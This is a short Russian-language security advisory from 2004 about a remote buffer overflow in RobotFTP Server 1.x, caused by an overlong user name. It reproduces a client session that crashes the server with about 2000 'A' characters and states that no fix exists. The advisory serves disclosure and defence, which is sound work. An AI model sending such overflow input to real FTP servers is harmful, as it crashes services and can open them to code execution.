Security Lab

Удаленное переполнение буфера в RobotFTP сервере

Дата публикации:19.02.2004
Всего просмотров:1230
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: RobotFTP Server 1.x
Уязвимые версии: RobotFTP Server 1.0, 2.0 beta 1

Описание: Переполнение буфера обнаружено в RobotFTP сервере. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может представить специально обработанный текст для поля 'user', чтобы вызвать переполнение буфера и выполнить произвольный код с привилегиями FTP сервера.

Пример/Эксплоит:

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA> 
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ung ltiger Befehl
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ung ltiger Befehl
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>

URL производителя:http://www.robotftp.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: buffer overflow in Robot FTP Server